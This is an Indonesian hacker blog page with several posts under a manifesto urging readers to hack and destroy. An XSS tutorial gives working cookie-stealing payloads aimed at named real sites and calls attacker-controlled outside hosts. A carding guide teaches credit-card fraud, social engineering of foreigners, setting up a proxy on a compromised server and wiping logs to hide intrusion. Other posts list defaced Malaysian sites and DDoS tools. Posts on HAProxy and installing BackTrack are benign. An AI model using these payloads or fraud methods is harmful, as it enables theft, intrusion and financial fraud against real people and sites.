_____  __     _____  ___    _____  ___    _____  _____  _____  _____  _____  _____    _____  _____    ____   _____  _ _ _  _____ 
|   __||  |   |  |  ||_  |  |   | || | |  |   __||   __|| __  ||  |  ||   __|| __  |  |     ||   __|  |    \ |     || | | ||   | |
|   __||  |__ |  |  | _| |_ | | | ||_  |  |__   ||   __||    -||  |  ||   __||    -|  |-   -||__   |  |  |  ||  |  || | | || | | |
|_____||_____| \___/ |_____||_|___|  |_|  |_____||_____||__|__| \___/ |_____||__|__|  |_____||_____|  |____/ |_____||_____||_|___|
               I DONT WANT TO BE FAME , I DONT WANT TO BE ANY EZINE , I JUST WANT TO SHARE KNOWLEDGE 

	 						
							                                  , ----.       ~ Fuck full-disclosure
							                              -  -     `        ~ Fuck the security industry
							                        ,__.,'           \      ~ Keep 0days private
							                      .'                 *`     ~ Hack everyone you can and then hack some more
							                     /       |   |     / **\    ~ Blend in.
							                    .                 / ****.   ~ Get trusted.
							                    |    mm           | ****|   ~ Trust no one.
							                     \                | ****|   ~ Own everyone.
							                      ` ._______      \ ****/   ~ Disclose nothing.
							                               \      /`---'    ~ Destroy everything.
							                                 \___(          ~ Take back the scene
							                                 /~~~~\         ~ Never sell out, never surrender.
							                                /      \        ~ Get in as anonymous, Leave with no trace.
							                               /      | \       ~ This your Fucking IP 
							                              |       |  \      ~ This your Fucking ISP  
							                    , ~~ .    |, ~~ . |  |\     ~ FUCK OFF I've got enough friends !!!!
							                   ( |||| )   ( |||| )(,,,)`    
							                  ( |||||| )-( |||||| )    | ^
							                  ( |||||| ) ( |||||| )    |'/
							                  ( |||||| )-( |||||| )___,'-
							                   ( |||| )   ( |||| )
							                    ` ~~ '     ` ~~ '











 



    

      
[ Blog ]

      
      
[ History ]

    

    

      

      







K.O WITH DDOS ATTACK


K.O WITH DDOS ATTACK

nah sekarang kita bahas tentang DDOS attack
kenapa harus diberi judul K.O WITH DDOS ATTACK ?
karena victim dari serangan ini pasti K.O :P
heuheuheuheu :P  ( mulai ngaco deh )
dan disini tidak ada unsur sok Tahu lagi deh
jadi langsung aja ke fact case nya aja ;)
heuheuheuheheu :P

==========
Pengertian
==========

DDOS singkatan dari Distributed Denial of Service attack
serangan tersebut adalah serangan DOS ( deial of service ) yang telah di mody
Yakni attacker dapat menembus beberapa mesin menjadi BOT atau artian kata ZOMBIE, kemudian mesin yang menjadi zombie mengendalikan beberapa mesin lagi menjadi zombie-zombie,akhirnya attacker akan mengendalikan zombie-zombie tersebut secara terdistribusi menyerang korban  untuk menghancurkan ketersedian source dari korban

===================
GAMBARAN KONSEPNYA
===================


ATTACKER === > ZOMBIE (KOODRINATOR) == ZOMBIE === VICTIM


                


==========
KETERANGAN
==========

serangan ini yakni harus menggunakan menggunakan banyak komputer untuk mengkordinir DoS attack ke target victim. Penggunaan teknologi client/server attacker dapat mengefektifkan serangan ini dengan memanfaatkan resource dari bagian komputer yang tanpa kita sadari bertindak sebagai platform serangan, layaknya virus yang hinggap di pc kita lalu melakukan aktifitas sendiri tanpa kita eksekusi. Sehingga program master DDoS diinstall pada salah satu komputer dengan menggunakan account yang telah dicuri,artian kata komputer tsb sudah menjadi zombie. Program master pada saat waktu yang ditentukan akan melakukan komunikasi ke sejumlah program “agent” yang akhirnya menginstall program tersebut dikomputer-komputer yang terhubung dengan internet. Ketika agent menerima command memulai serangan, penggunaan client/server program master dapat mengendalikan ratusan bahkan ribuan komputer yang memiliki program agent atau PC yang menjadi zombie untuk memulai serangan dalam waktu yang cepat :)

============================
KONSEP SERANGAN SECARA UMUM
============================

attacker biasanya melakukan serangan secara langsung yang menggunakan ip-spoofing atau dengan exploits yang berjalan di shell unix.
konsep serangan bervariant, dan sebagai contoh seperti :
-SMURF ATTACK / FLOODING
-UDP FLOOD
-SYN Flooding
-Stealth Bomb
-Apache Benchmark
-Shaft
-OMEGA
-Trinity
-Plague
-exploits : kod.c, bonk.c, teardrop.c, NesTea2,iispdos.pl,Fork Bomb.pl,fadvWWhtdos.py, dsb

===============================
PENANGGULANGAN SERANGAN
===============================

mungkin menurut vina konsep penanggulangan serangan ddos cukup sulit.
tapi mungkin ada beberapa ilmu yang mungkin berguna :)

-melakukan Signature-based detection
-membangun ITRACE
-Phusback
-Tunneling – IP Overlay
-membangun Honeypots
-selalu capture traffict :)
-update informasi security
-bila menggunakan windows (usahakan agar terhindar dari virus) karena banyak kasus yang sering terjadi seperti:

SI A : oh iya kk saya kena serangan DDOS !
SI B : hmmmm ?
SI A : jaringannya mungkin ?
SI B : yakin ?
SI A : ya pasti yakin, koneksi saya putus" dan untuk latencynya besar sekali :(
SI B : hmmm. km sudah periksa fisik jaringannya ?
SI A : maksudnya ?
SI B : ya, km periksa dulu fisik jaringannya ,seperti kabel,NIC,hub,dsb.
SI A : udah di periksa, dan alhasil tidak ada kerusakan apa" .
SI B : Coba km capture semua traffict yang sedang running di pc km ?
SI A : semuanya normal, dan tidak ada yang patut di curigakan, jadi gimana ?
SI B : klo begitu km periksa pc km, apakah ada virusnya, biasanya virus kan selalu melakukan aktifitas di luar dugaan kita,ya        seperti running autoupdate yang sering mengganggu aktifitas koneksi kita :) . cobalah untuk belajar forensik dulu.        heuheuheu :P
SI A : oh iya kk , disini banyak virusnya yang running :P ,
SI B : zzzzzzzzzzzzzz... -__-"

=================================
KASUS - KASUS
=================================
inilah sebagain dari situs" besar yang sudah pernah terserang DDOS seperti
Ebay, Amazon, Buy.com, CNN.com, dan Yahoo.com, kaskus.us,kpu.go.id,dan tabulasi kPU :) ,dll



========================
tHx
eLv1N4
========================
Labels: 



On 5/24/09 at 

10:31 PM





Introduction to Load Balancing with HAPROXY

Load balancing (LB) adalah salah satu technology yang udah cukup lama, namun tidak cukup familiar di kalangan IT itu sendiri,padahal hampir sebagian besar site-site yang memiliki traffic tingkat tinggi pasti menggunakan teknologi LB untuk membagi beban ke server atau cluster yang mereka miliki. berikut ini adalah contohnya:
%host -t a www.detik.com
www.detik.com is an alias for detik.com.
detik.com has address 202.158.66.94
detik.com has address 203.190.241.41
detik.com has address 203.190.241.43
detik.com has address 202.158.66.190
detik.com has address 202.158.66.86
detik.com has address 203.190.241.166
detik.com has address 202.158.66.20

%host -t a www.google.co.id
www.google.co.id is an alias for www.google.com.
www.google.com is an alias for www.l.google.com.
www.l.google.com has address 66.249.89.104
www.l.google.com has address 66.249.89.147
www.l.google.com has address 66.249.89.99


Okey, 2 contoh diatas cukup memberi gambaran bahwa kedua site tersebut menggunakan teknologi balancing. Untuk definisi LB itu sendiri bisa dibaca disini. LB memiliki beberapa algoritma atau metode dalam membagi beban ke server atau cluster yang mereka miliki:

1. DNS Load Balancing
Metode ini menggunkan sebuah domain name yang menunjuk ke-beberapa IP publik sekaligus, silahkan baca disini untuk keterangan lebih lanjut

2. Random Allocation
Ini adalah algoritma random, tidak ada yang perlu dijelaskan lebih lanjut, karena algoritma ini membagi beban ke server secara random tanpa ada sebuah pola yang jelas.

3. Round Robin
Round robin membagi incoming request secara rotasi, jadi misalkan ada 3 server yang menjadi anggota dari sebuah cluster, ketika ada request pertama, maka server A yang akan menghadle-nya, request kedua Server B, request ketiga server C. Kemudian ketika ada request ke-4 maka itu akan dirotasi lagi ke server A kemudian request ke-lima akan diberikan ke server B, begitu seterusnya. selengkapnya bisa anda baca disini

4. Weighted Round-Robin Allocation
Algoritma ini adalah pengembangan dari algoritma round robin, sedikit perbedaannya adalah algoritma ini bisa membagi beban lebih tinggi ke server atau cluster yang memiliki resource yang lebih besar

Ada banyak aplikasi maupun hardware yang bisa menjalankan teknologi LB. Cisco, F5, Barracuda, dan Juniper adalah beberapa vendor yang menyediakan dedicated hardware untuk service LB. Sementara itu untuk software, anda bisa melihatnya disini
Diantara beberapa aplikasi LB, salah satu yang cukup menarik bagi saya adalah haproxy, karena selain ringan, juga cukup mudah dalam penggunaannya. Mari kita coba menjalankan haproxy dengan kasus sederhana. Saya menggunakan system OpenBSD sebagai mesin load balancer.

Saya mem-build haproxy dari ports:
# uname -a
OpenBSD k-elektronik 4.4 GENERIC#0 i386
# cd /usr/ports/net/haproxy/
# cat distinfo
MD5 (haproxy-1.3.15.2.tar.gz) = pk1/WnRk52n4Z2gCvo6PNg==
RMD160 (haproxy-1.3.15.2.tar.gz) = YHMIoB0/Y/d6x65m00Krml6Ikn8=
SHA1 (haproxy-1.3.15.2.tar.gz) = LRPN8fhog+eFcffPI4qb+MAupC8=
SHA256 (haproxy-1.3.15.2.tar.gz) = YgK8PuWbtVe+WsgMfKQrOUnaBL0plx4395HSdxwOQmQ=
SIZE (haproxy-1.3.15.2.tar.gz) = 501219
# make install clean
# /usr/local/sbin/haproxy -v
HA-Proxy version 1.3.15.2 2008/06/21
Copyright 2000-2008 Willy Tarreau


untuk konfigurasi dengan 2 server farm, minimal file config haproxy terlihat seperti berikut:
# cat haproxy.conf
global
log 127.0.0.1   local0
log 127.0.0.1   local1 notice
maxconn 1024
ulimit-n 65536
daemon
nbproc      8 # Number of processing cores

defaults
mode            http
log             global
option          httplog
option          dontlognull
clitimeout      180000
srvtimeout      180000
contimeout      100000
retries         15
option          redispatch
option          httpclose
option          abortonclose
option          httpchk

listen  http_main 11.11.11.11:80 # bukan IP sebenarnya :D
option httpclose
option forwardfor
cookie apaaja insert indirect nocache
option httpchk /http_check.html
balance roundrobin # Load Balancing algorithm

server server01 192.168.1.1:80 check inter 2000 rise 2 fall 5
server server02 192.168.1.2:80 check inter 2000 rise 2 fall 5


sebelum menjalankan haproxy, pastikan bahwa kedua webserver anda telah jalan dengan baik
#/usr/local/sbin/haproxy -f /usr/local/etc/haproxy.conf
# ps xw | grep haproxy | head -n 1
845  ??  Ss     0:52.58 /usr/local/sbin/haproxy -p /var/run/haproxy.pid -f /usr/local/etc/haproxy.conf


banyak sekali hal menarik yang anda bisa lakukan dengan haproxy, silahkan baca disini, dan juga ini untuk pendalaman lebih lanjut. For security..?!hhmm, i will post it again later.


author  : jackD
resensi : http://www.kecoak-elektronik.net/log/2009/01/23/introduction-to-load-balancing-with-haproxy/
Labels: 



On 5/6/09 at 

9:19 AM





Apa sih ?

pagi pagi buka browser dengan ditemani sedikit cemilan, nyoba buka sobekan kecil dengan php injecktion sekalian check file di suatu situs ( barangkali ada malware :P )


sial banget yang ini not w00t 



tapi ketika tempelin hollyshit  dan jessica
akhirnya masuk :P 
heuheuheu


akhirnya datang juga  


  

klik gambar biar jelas



lalu iseng melakukan touch system.

jangan lupa untuk mengisikan code php berikut bilamana akan melakukan perbaikan :) 

$page = $_GET[page];
switch($page)
{
case “elvina.php”:
include(”elvina.php”);
break;
case “yess.php”:
include(”yess.php”);
break;
default:
include(”elvina.php”);
}
?>


dan setting server menjadi 

allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc= on
open_basedir = “/www/html/servelvina”



hal tersebut hanya untuk membedakan pengincludekan file yang hanya bisa dilakukan di elvina.php dan yess.php
dan jangan lupa untuk berhati-hati dalam penanggulangan 3rd party pada sebuah cms.
setting safe mode untuk menjadi on :) 
dont forget to touch your system now ! 

contoh nya jadi gini

Warning:  include() [function.include]: Failed opening '' for inclusion (include_path='.;E:\php5\ext;E:\php5\PEAR;E:\php5\PhpCommon') in I:\www\targetnya\public_html\yess.php on line 134



tapi nonsense cara pembaruan system seperti ini tidak menjamin system anda aman 100% 
banyak sekali hole di situs anda yang vulner terhadap serangan lainnya.


.tHx 

eLv1N4
Labels: 



On 5/5/09 at 

10:03 PM





Thnx Mr.x

yuk kita belajar xss

soalnya ada yang request tutor buat XSS

pada rewel biasa , minta share ini itu  maksa banget yaudah vina share deh

tapi maaf kalau tutor nya masih berantakan , soalnya masih sama" belajar

oke . kita ke XSS

da banyak cara yang bisa di lakukan jika kalian mempunyai target yang memiliki vulner xss

hal utama dari xss adalah ,pengambilan cookies + trace back attacker dan phising

ok disini vina akan sedikit jelaskan tentang polanya , sorry cuma sedikit , vina lagi sakit , jadi ga mood klo mikir . kok vina lagi sakit ga ada yang tengok yah T_T

ok deh sekarang ga usah banyak ngomong lagi ,

mulai dari konsep serangan trace back and steal cookies :P

pertama copy paste script trace back and steal cookies ini

http://elvina.cc/trace.txt

save dalam bentuk php

ok lanjut, sekarang vina ambil contoh target , ini

http://libraryphoto.cr.usgs.gov/cgi-bin/search.cgi?search_mode=noPunct&selection=xss

ok , sekarang lanjut untuk menginjeksi di dalam url target,

<####SCRIPT ="VXCS" SRC="http://www.tni.mil.id/images/front/damn.php"></####SCRIPT>


nah target menjadi 



http://libraryphoto.cr.usgs.gov/cgi-bin/search.cgi?search_mode=noPunct&selection=%3CSCRIPT%20=%22XSS%22%20SRC=%22http://www.tni.mil.id/images/front/damn.php%22%3E%3C/SCRIPT%3E



ok lalu jika ada orang yang mengclick halaman tersebut , atau 
scriptkidd0z . maka kita dapat menjejaki si attacker ,
heuehue :P mungkin bilamana si attacker tidak mengclears cookies saat dia 
membuka layanan webchat media, maka cookies akan terekam juga disana.



kita bisa lihat di sini 

http://www.tni.mil.id/images/front/log.txt



-> selanjut nya kreasikan sendiri, ^_^



-> ok sekarang lanjut ke pengambilan cookies dalam target 



pertama seperti biasa , save code ini 



########location.href = 'http://www.indonesianhacker.org'+document.cookie;######## 



pengambilan sessionid  bisa saja terjadi bilamana admin web target tidak mendisable ASP Session State, maka ketika kita meninjeksi dengan cara xss steal cookies . 



live demo 

http://www.honda.co.il/search/search.asp?SearchParam=




setelah kita mengetahui sessionidnya , ok kalian bisa kembangkan pola 
serangan , dengan session fixation attack ^_^ , 



https://addons.mozilla.org/en-US/firefox/addon/6683



fire cookies 


https://addons.mozilla.org/en-US/firefox/addon/1843



firebugs

catatan untuk script 
*hilangkan tanda #### 


atau kalian bisa memanfaatkan XSS sebagai alat untuk menyerang komputer orang lain / botnet 

nah pengen tau yah caranya gimana xss bisa menjadi alat untuk spread botnet :P bisa logger"an loh . atau bisa melakukan sekaligus teknik BOF ( buffer overflow ) ke komputer target , clue nya ya kalian harus ngerti dulu tentang IIS dong yang pasti nya , gimana cara add user + kalian mesti punya server sendiri , bisa gunakan dedicated server atau rubah pc km menjadi server localhost untuk penyimpanan db victim yg kita peroleh dari xss

serius nih pengen tahu ? kontak aja vina kalau mau tau 
Labels: 



 at 

12:56 AM





Hacker Malaysia Berunding Untuk Damai Dengan Hacker Indonesia

tadi pagi aku chat dengan salah satu temanku di dunia underground crussd2 

setelah bercakap" dengannya tiba-tiba dia beri link site yang katanya berisi tentang pernyataan hacker malaysia yang akan berdamai dengan hacker indonesia.

tapi tiba - tiba hati vina dag dug deg ga karuan 
pouffftt......

OH MY GOD takut sekali T_T 
dikasih link sama anak underground membuat hati vina jadi bingung.
di benak vina berfikir "buka atau ngga, buka atau ngga" .
poufftt ,ya sudah vina memberanikan diri untuk membuka situs itu 
lalu alhasil benar loh 
hasil dari forum HMSECURITY yang konon itu forum hackernya malaysia. 
hmmmm..
bener juga tuh kata kk Crussd2 
heuheuheuheu
maaf yah kk cruss , vina udah berfikir yang macam" xP

berikut linknya

http://www.hmsecurity.org/v3/beta/loading.../forum/viewthread.php?forum_id=16&thread_id=1330&pid=15007


hmmm setahu vina sih indonesia sudah melakukan cybernaticwar dengan malaysia untuk ke 2 kalinya. 
untuk hasil yang vina ketahui indonesia menang telak dari malaysia :) 
berikut situs" yang pernah di retas oleh hacker indonesia : 


http://inter.com.my/
http://anuarbiz.motivasi.net.my/
http://ebuku.motivasi.net.my/
http://zazaopicalhouse.motivasi.net.my/
http://musicrecords.motivasi.net.my/
http://www.asosb.com.my/sekolah/perpustakaan/view.html
http://kanzzs.motivasi.net.my/
http://ksrid.eceylinco.com.my/
http://hidroboost.motivasi.net.my/
http://www.johordt.gov.my/pnj/administrator/
http://www.vibrant.com.my/news.php
http://www.gtb.com.sa/images/url.htm
http://elysianphotography.com/
http://ramezouss.ra.funpic.de
http://www.lakelandptv.org/templates/elvina.php
http://video.exnet.gr/templates/index.php
http://www.magictradingcanada.com/admin
http://quickwebscripts.com/templates/
http://www.giant.com.my/news.php
http://novinparsian.ir/download/elvina.php
http://techpoint2u.net/templates/md_glossypaint/index.php
http://www.pemudapahang.net/administrator/components/
http://fst.upsi.edu.my/images/
http://www.malaysiansia.com/
http://www.campuslife.com.my/index.php/articles-a-student-advice/clueless-about-studying/48-clueless-about-studying/24-contact-us
http://techpoint2u.net/index.php/about.html
http://www.purnama2u.com/v5/index.php/agama-dan-keluarga/tazkirah/58-tazkirah/1593-penghayatan-ibadah-korban-dalam-perjuangan-pas
http://cms.motionworks.com.my/
http://www.wealthlink.com.my/index.php?option=content&task=view&id=181&Itemid=27
http://jmsb.com.my/products/productlist.aspx?Page=5&bid=&mid=&searchmode=2¶mresult=MPV
http://pnpftmk.upsi.edu.my/~poac/xampp/htdocs/xampp/joomla/index.php?option=com_content&view=article&id=90%3A497-orang-asli-mampu-dapat-lesen-memandu&catid=1%3Alatest-news&Itemid=139
http://staff.iiu.edu.my/bsukry/?p=32
http://www.lodgeschool.edu.my/index.php
http://www.tegastepat.com.my/
http://ppddungun.edu.my/
http://malay.cari.com.my/archiver/?tid-274364.html
http://www.bookshop.com.my/modules/whatnews/news.php
http://www.timelessdesign.com.my/shop/modules/whatnews/news.php
http://www.emalaysia.com.my/
http://www.mycountydeals.com/cgi
http://www.mycountydeals.com/components
http://www.mycountydeals.com/components/com_artforms/assets/captcha/
http://crazzyspace.com/system/cache/
http://www.a1e.es/templates/beez/index.php
http://bumiventures.com/
http://special0.time.net.my/time4u/music/article.cfm?ID=174
http://21stcentury.com.my
http://cms.lclgroup.com.my
http://corpex.com.my
http://www.kbse.com.my/en/
http://www.hkl.gov.my/content/jiah.php
http://helanghotellangkawi.com
http://www.ktdi.com.my/
http://jennydboutique.com.my
http://klonline.com.my
http://inter.com.my
http://geomatika.edu.my
http://www.inhad.org.my/Institutedetail.aspx?ID=9
http://graduanbersatu.com.my
http://e-host.com.my
http://dtcbizcentre.com.my
http://demo.shops.com.my
http://langkawigeopark.com.my
http://pronutrition.com.my
http://puspatri.edu.my
http://free.my
http://carepro.com.my
http://salesdo.com.my
http://seri-abim.edu.my
http://adsrealestate.net.my
http://alfioraldo.my
http://kgsripayakulai.com/joomla/
http://kadkahwinworld.com/ver1/
http://tukulesto.tanjaktech.com.my/hell.php
http://www.sinsualdaydreams.com/newcontact.html
http://tukulesto.gtfsabah.com/
http://www.jkhairat.com.my/Default.php
http://www.krafmalaysia.com.my/
http://tls.damansaraassets.com.my/Default.php
http://ansar.damansaraassets.com.my/Default.php
http://emagazines.com.my/index.php
http://www.bnm.gov.my
http://www.juzi.org.my/
http://specialcashsweep.com.my
http://www.autem.org.my
http://www.kidzmag.com.my
http://www.pdtjasin.gov.my
http://portal.pahangtourism.org.my/
http://wianex.net/cms/administrator/index.php
http://www.alpine.com.my/category01.asp?currentPage=2
http://gov-malaysia.bchomeschool.net/CREDITS.php
http://malaysia.stansmixertrucks.com/blast_demo.html
http://malaysia.austrocan.com/
http://btpnlabuan.moe.edu.my/skbukitkalam/
http://btpnlabuan.moe.edu.my/skbebuloh/
http://btpnlabuan.moe.edu.my/skrancharancha/
http://asiawebserver.net/malaysiaontoday/
http://asiawebserver.net/missalifah/
http://kelantanredwarriors.com/
hfckp://btpnlabuan.moe.edu.my/
http://leluhur-bugis.4u.net.my/news/
http://pnpftmk.upsi.edu.my/~poac/xampp/htdocs/xampp/joomla/index.php?view=article&catid=1:latest-news&id=90:497-orang-asli-mampu-dapat-lesen-memandu&tmpl=component&print=1&page=
http://www.microair.com.my/
http://www2.ikm.edu.my/kl/index.php?option=com_docman&task=cat_view&Itemid=65&gid=63
http://www.epu.jpm.my/mdi1/Default.asp
http://www.fish.net.my/details.php?id=124
http://staff.iiu.edu.my/bsukry/?p=32
http://www.msti.com.my/
http://www.nrtechnologies.com.my/
http://www.alpine.com.my/news.asp
http://www.13am.com.my/products.php?c=22&p=30
http://www.itools.com.my/home/
http://www.i-putra.com.my/news_events.cfm?id=191
http://www.kmb.edu.my/



huftt untung aja vina bukan hacker 
:)
jadi ga perlu pusing untung mikirin yang kaya gitu :)
Labels: 



On 5/3/09 at 

8:38 PM





BACKTRACK 4 BETA SUDAH DI RILIS

kemarin udah nyoba backtrack 3 final, tapi pas mau install langung ga bisa 2
hufftt, kepaksa install ulang distro backtracknya 1
oke nih sedikit masukan cara untuk install backtrack 3 final
-buat partisi untuk backtrack dengan filesystem ReiserFS ( jika anda akan membuat 1 os di pc anda )
-buat partisi pertama untuk root dengan size min 5 Gb (recommendasikan dengan kapasitas hd anda )
-buat partisi kedua untuk swap dengan size 2 kali dari jumlah RAM komputer (ex: ram 1 GB = Swap 2GB)
-lakukan Booting menggunakan Live CD Backtrack 3 Final
-klo udah masuk ke dalam sistem, gunakan terminal dalam Backtrack untuk melakukan format partisi
#mkreiserfs /dev/sda3
#umount /dev/sda3

-buatlah folder untuk umount partisi baru tersebut dengan cara :
#cd /
#mkdir /mnt/backtrack
#mount /dev/sda3 /mnt/backtrack

-Download Slack Installernya
–13:00:22–  http://backtrack.serveftp.com/backtrack … stall.kmdr
=> `slax6-install.kmdr’
Resolving backtrack.serveftp.com… 137.132.19.24
Connecting to backtrack.serveftp.com|137.132.19.24|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 12,607 (12K) [text/plain]

8% [===================>                     ] 1,068         –.–K/s    ETA 01:32
100%[===========================================>] 12,607         1.98K/s    ETA 00:00

13:04:10 (747.24 B/s) - `slax6-install.kmdr’ saved [12607/12607]


-klik slack installer
# /usr/bin/kmdr-executor slax6-install.kmdr

-jika anda mempunya 2 os, setting lilo.conf agar bisa booting OS lainnya.
#cd /
#nano /etc/lilo.conf
boot = /dev/sda
prompt
timeout = 1200
change-rules
reset
vga = 773
image = /boot/vmlinuz
root = current
label = BackTrack
read-only
# Tambahkan OS Windows
other = /dev/sda1
label = Windows
table = /dev/sda

-jalankan lilonya 1
#lilo -v

-restart pc/nb km
-selamat menikmati fasilitas backtrack 3 1 seperti hack wireless 10 jadi ngenet gratis,merubah password ap orang lain 10, tahan serangan dos (denial of service) 1 .

nah sekarang lanjutnya wah wah udah ada backtrack ver 4 beta dengan kekuatan baru. Ya meskipun masih beta, tapi soal kekuatannya lebih baik dari backtrack 3 tentunya 10 (sotau yah vina 10 )
Yang beda dari backtrack 4 adalah, tidak lagi menjadi turunan dari slackware, sebagai gantinya  backtrack 4 ini menginduk kepada Distro Linux Debian, dengan mengakar kepada utilitas repositori milik Ubuntu. tapi aneh nya backtrack 4 memiliki jam tayang lebih panjang karena hadirnya sistem sinkronisasi dengan repositori backtrack online. dengan artian klo misalkan ada tools security yang jalan akan automatis melakukan update 4
inilah feature"nya
    * Kernel 2.6.28.1 with better hardware support
    * Support for PXE Boot
    * SAINT EXPLOIT
    * MALTEGO
    * Unicornscan - Fully functional with postgress logging support and a web front end.
    * RFID support
    * Pyrit CUDA support
    * The latest mac80211 wireless injection pacthes are applied, with several custom patches for rtl8187
       injection speed enhancements. Wireless injection support has never been so broad and functional.
    * New and updated tools


klo mau download aja
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
854 MB, DVD Image
Labels: 



 at 

8:17 PM





apa itu CARDING ?

CARDING ? apakah itu berbahaya ?



pasti anda sudah lama dengar tentang bahasa "carding" si robber dalam dunia maya

kegiatan pencurian data" penting yang di lakukan oleh suatu kumpulan maupun personal.

mereka hanya mengincar kesenangan dan harta 1

mayoritas mereka tumbuh dari irc atau (internet relay chat), dengan asumsi memperbanyak kenalan" hacker,spamer,carder lainnya

mereka bergerak di bidang carding via toko online

biasanya mereka mendapatkan data" penting seperti: account & password ebay,password & paypal,informasi credit card ( cc ), account moneybooker, dan account bank asing.

teknik mereka tidak jauh beda dengan teknik hacker yang biasanya melumpuhkan system pengamanan, tetapi kebanyakan dari mereka mengutamakan target berupa toko online,

mereka incar data" penting shoppingcart dari toko.

relavan mereka gunakan teknik lfi carding 1.

sesudah mereka mengumpulkan data" penting, biasanya langsung menuju situs penggalangan dana (donate) seperti uniceff, untuk memastikan cc itu valid atau decline.

susudah mereka puas beramal dengan dana oranglain, nah sekarang adalah mencari toko online, biasanya mereka incar toko" yang terpampang di google

lalu sedikit demi sedikit mereka melakukan ctrl +c , dam ctrl + v , pada form pengisian pembayaran.

atau mereka lakukan negosiasi dengan penjual (layaknya pembeli asli, yang mengusahakan penjual percaya pada pembeli)

menempatkan semua transaksi ilegal di jasa pengataran barang seperti ups,hdl,fedex,tiki,dll

walaupun indonesia sudah di cap sebagai negara fraud.

tapi masih banyak juga carding di indonesia.

tak jarang juga mereka memalsukan ktp,debet,bahkan kartu atm ( anjungan tunai mandiri )

ck.ck.ck.ck.ck



bukan hanya di bidang toko online saja

situs ebay,paypal pun tak luput dari serangan usil mereka

mereka sengaja menyimpan trap" di setiap situs yang trhbng ke situs pp ataupun ebay untuk mendapatkan account tsb.

makannya tak asing lagi klo misalkan account anda sudah di rubah atau telah di jejaki oleh mereka.

namun sekarang paypal tidak begitu di sukai oleh komunitas carder karena susahnya pengambilan uang secara tunai.

tapi klo misalkan untuk withdraw pp ataupun transaksi antar pp sekarng masih bisa di lakukan.

biasanya sih untuk membuat account bank asing,

itupun kita bisa lakukan dengan cara :



a) membuat account penyedia paypal gratis ( klo mau bermodal, ya kita harus mempunya account bank luar )

cat : seperti finderfriend, atau kita bisa memanfaatkan media chat seperti facebook,fs,myspace,lc,msn

kita adosikan sebagai orang yang dekat dengan orang luar negri., nah disini kita harus banyak   

berbicara bla.bla.bla supaya si bule (teman baru kita) percaya.

nah klo udah percaya 100 %.

gunakan imajinasi kita dan logika. suruh dia untuk berbaik hati kepada kita untuk membuatkan

account bank luar 4 heuheuheu

atau kita bisa memanfaatkan teman" di forum underground luar lainnya.untuk bisa di ajak bekerja

sama 1

b) klo misalkan account paypal anda sudah jadi, dan atm nya sudah terkirim ke rumah anda, lakukan apa yang

kita maksud 1 yaitu teruslah tf pp bule sebanyak anda mau ke pp kita 1





============================================================

|                    hal yang dilakukan oleh mereka                                                                                   |

============================================================

contoh pemalsuan ktp

: 







tujuan utama : untuk menyamarkan identitas asli 10 ( tetep cantiq )



============================================================

menyiapkan proxy (menyembunyikan identitas)

mencari target lalu upload php shell

contoh dalam shell:



wget elvinaproxy.com/wow/files/proxy.tgz

tar -zvxf proxy.tgz

cd pro

./xh -s ./usr/apache/httpd ./prox -a -s -d5555 (5555 its your port)

/sbin/ifconfig/ ( to check your ip in your shell target )

rm -rf proxy.tgz ( remove archive proxy )

/dns elvinaproxy.com (check your connectivity @irc your trusted server)



pasang proxy di browser anda 1

lalu cek di : http://cmyip.com . http://ip-adress.com , dsb

============================================================

contoh pengambilan creditcard

: 







tujuan utama      `: peluru utama [amunisi]

serangan           : sqlinjecktion all variant,rfi,lfi,rce,etc.

tools              : putty.exe,sqlmap,fuzzer,password cracking tools ( recommended )

exploits           : bindtty.c, c99.php, r57.php,root.tar.gz,xpost.tgz,etc



hal yang penting jika km sudah menjejaki sebuah server lewat putty,telnet,terminal :

hapus log itu



rm -f /.bash_history /root/.bash_history /var/log/messages

ln -s /devory

ln -s /dev/null /root/.bash_history

touch /var/log/messages

chmod 600 /var/log/messages

rm -rf /var/log/lastlog

cat /var/log/lastlog

ctrl + d





============================================================

NEgosiasi kpd sang penjual

sedikit contoh: jangan di tiru 10

elv1n4: hi, iam interest to buy some your item

seller: ok which one ?

elv1n4: bla,bla,bla,bla

elv1n4: can you send the item to indonesia ?

seller: hmmm.. iam not sure

elv1n4: why [zzzzzzz... masa sih ?]

elv1n4: cmon dude i need that item to my son in indonesia [dehhh ngerayu..]

seller: wait for a sec

elv1n4: bla.bla.bla.bla

seller: your transaction was aborted

elv1n4: what, i have paid to you, so what i must gonna do ?

seller: ok. i wanna package your item

elv1n4: thnx dude. i will wait a tracking number

============================================================

contoh hasil hasilnya

minggu kemarin iseng beli 4 cd game dapet bonus mp3 samsung broken white 4 GB limited edition [sellernya baik banget 10]

:











============================================================







Carding sendiri dalam versi POLRI meliputi :

1. Mendapatkan nomor kartu kredit (CC) dari tamu hotel, khususnya orang asing

2. Mendapatkan nomor kartu kredit melalui kegiatan chatting di Internet

3. Melakukan pemesanan barang ke perusahaan di luar negeri dengan menggunakan Jasa Internet

4. Mengambil dan memanipulasi data di Internet

5. Memberikan keterangan palsu, baik pada waktu pemesanan maupun pada saat pengambilan barang di Jasa Pengiriman (kantor pos, UPS, Fedex, DHL, TNT, dan lain-lain.)

Carding (pelakunya biasa disebut carder), adalah kegiatan melakukan transaksi e-commerce dengan nomor kartu kredit palsu atau curian. Pelaku tidak harus melakukan pencurian atau pemalsuan kartu kredit secara fisik, melainkan pelaku cukup mengetahui nomor kartu dan tanggal kadaluarsanya saja .

a.d. b. Ketentuan yang berkaitan dengan perusakan, penghancuran barang

Ketentuan tersebut sangat berkaitan erat dengan kejahatan yang hacking dan craking . Dalam kejahatan komputer (computer crime), perbuatan perusakan, penghancuran barang mempunyai pengertian suatu perbuatan yang dilakukan dengan suatu kesengajaan untuk merusak / menghancurkan media disket atau media penyimpan sejenis lainnya yang berisikan data atau program komputer sehingga akibat perbuatan tersebut data atau program yang dimaksud menjadi tidak berfungsi lagi dan pekerjaan-pekerjaan yang melalui proses komputer tidak dapat dilaksanakan . Sedangkan pada kejahatan mayantara (cyber crime) perbuatan perusakkan dan penghancuran barang ini tidak saja ditujukan untuk merusak / menghancurkan media disket atau media penyimpan sejenis lainnya melainkan dapat juga perbuatan merusak dan menghancurkan tersebut ditujukan terhadap suatu data, web site ataupun hompe page. Delik ini juga termasuk didalamnya perbuatan merusak barang-barang milik publik (Crime Againts Public Property).

